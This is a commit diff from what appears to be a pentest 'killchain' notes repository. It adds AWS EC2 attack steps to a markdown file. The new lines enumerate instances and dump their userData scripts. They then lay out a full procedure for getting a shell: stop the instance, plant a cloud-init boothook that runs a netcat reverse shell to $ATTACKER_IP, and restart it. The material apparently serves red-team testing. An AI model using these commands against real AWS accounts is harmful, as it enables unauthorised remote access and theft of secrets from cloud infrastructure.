whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

added more details about the EC2 connections

This commit is contained in:
gurkenhabicht 2024-02-19 22:44:01 +01:00
parent 4032ccbcad
commit 1f86484039
1 changed files with 58 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

58
Enumeration/AWS.md
View File

@ -700,6 +700,27 @@ Deploy service instances of Virtual machines inside a VPC.
Deployment EC2 instances into 26 regions. Supports multiple OSs. Deployment EC2 instances into 26 regions. Supports multiple OSs.
On-demand billing. On-demand billing.
#### Enumerate EC2 Instances
List EC2 instances in the account via aws cli.
```sh
aws ec2 describe-instances --query 'Reservations[*].Instances[*].Tags[?Key==`Name`].Value,InstanceId,State.Name,InstanceType,PublicIpAddress,PrivateIpAddress]' --profile PROFILENAME --output json
```
List all InstanceIds in the account via aws cli.
```sh
list=$(aws ec2 describe-instances --region <region_name> --query Reservations[].Instances.InstanceId --output json --profile PROFILENAME) | jq .[] -r
```
Get user data like cloud-init scripts from the instances via aws cli.
```sh
for i in $list;do
aws ec2 describe-instance-attribute --profile PROFILENAME --instance-id $i --attribute userData --output text --query UserData --region <region_name> | base64 -d | > $i-userdata.txt
done
```
#### Connect to an EC2 Instance #### Connect to an EC2 Instance
Connect to the instance using SSH, RDP, SSM, serial console or webconsole. Connect to the instance using SSH, RDP, SSM, serial console or webconsole.
@ -725,6 +746,42 @@ Instance Connect and the SSM Session Manager can be used to reset the root
password via `sudo passwd root`. After that it is possible to connect to the password via `sudo passwd root`. After that it is possible to connect to the
root user, e.g. using serial console or just use `sudo su root` or `su root` directly. root user, e.g. using serial console or just use `sudo su root` or `su root` directly.
##### Connect to an EC2 Instance Using a Reverse Shell
The InstanceId has to be known, watch [Enumerate EC2 Instances](#Enumerate-EC2-Instances) to get these IDs.
Stop the machine using the InstanceId through aws cli.
```sh
aws ec2 stop-instances --profile PROFILENAME --instance-ids $INSTANCE_ID
```
Creat a cloud-init script which contains the reverse shell. The file should contain somethin like the following example, so it will executed at boot time.
```sh
#cloud-boothook
#!/bin/bash -x
apt install -y netcat-traditional && nc $ATTACKER_IP 4444 -e /bin/bash
```
Encode the shellscript via base64.
```sh
base64 rev.txt > rev.b64
```
Upload the encoded file to the stopped instance via aws cli.
```sh
aws ec2 modify-instance-attribute --profile PROFILENAME --instance-id $INSTANCE_ID --attribute userData --value file://rev.b64
```
Start the instance with the uploaded file included via aws cli. Wait for the reverse shell to catch up.
```sh
aws ec2 start-instances --profile PROFILENAME --instance-ids $INSTANCE_ID
```
#### EC2 and IAM #### EC2 and IAM
EC2 instances can use nearly any other service provided by AWS. EC2 instances can use nearly any other service provided by AWS.
@ -925,3 +982,4 @@ List available load-balancers via aws cli.
```sh ```sh
aws elbv2 describe-load-balancers --query Loadbalancers[].DNSName --output text aws elbv2 describe-load-balancers --query Loadbalancers[].DNSName --output text
``` ```